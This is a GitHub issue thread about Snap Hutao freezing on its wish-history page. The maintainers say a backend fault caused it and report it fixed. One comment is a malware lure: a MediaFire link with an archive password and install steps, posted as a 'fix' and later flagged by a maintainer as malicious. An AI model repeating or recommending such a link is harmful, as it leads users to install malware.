### ISSUE TITLE
[Bug]: 祈愿记录全白卡死 只能终止进程

### ISSUE THREAD

**Issue by vesugier** [DGP-Studio/Snap.Hutao#1937]
### 检查清单

- [X] 我已阅读 Snap Hutao 文档中的[常见问题](https://hut.ao/advanced/FAQ.html)和[常见程序异常](https://hut.ao/advanced/exceptions.html)，我的问题没有在文档中得到解答
- [X] 我知道[文档站](https://hut.ao/zh/menu.html)的导航栏中有**搜索功能**，且已经搜索过相关关键词
- [X] 我的问题不是[已完成](https://github.com/DGP-Studio/Snap.Hutao/issues?q=is%3Aopen+is%3Aissue+label%3A%E5%B7%B2%E5%AE%8C%E6%88%90)的问题也不是一个别人已发布的**重复的**问题

### Windows 版本

0

### Snap Hutao 版本

1.11.0

### 问题分类

祈愿记录

### 发生了什么？

如题

### 最后一步

- [X] 我认为上述的描述已经足以详细，以允许开发人员能复现该问题

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Masterain98** [comment]
本贴中曾出现过一个危险帐号，发布了一个包含恶意程序的下载链接，如果你收到了邮件提醒并包含其评论内容，请勿点击下载。

**Comment by unlikehuman** [comment]
同样的问题
![image](https://github.com/user-attachments/assets/03d24f3d-c236-442f-a768-95668f2e00e4)
退出进程后重新运行软件，发现已登录的米游社账户被退出，手机验证码登录按钮不可用
![image](https://github.com/user-attachments/assets/13a7726e-404e-49bb-94e5-d34d2f017816)

**Comment by Lightczx** [comment]
fixed

**Comment by Masterain98** [comment]
忘修测试版的后端了，已经修复了，预计几分钟内恢复

**Comment by woqucc** [comment]
same here

**Comment by Lightczx** [comment]
请在主界面等待卡片停止闪烁
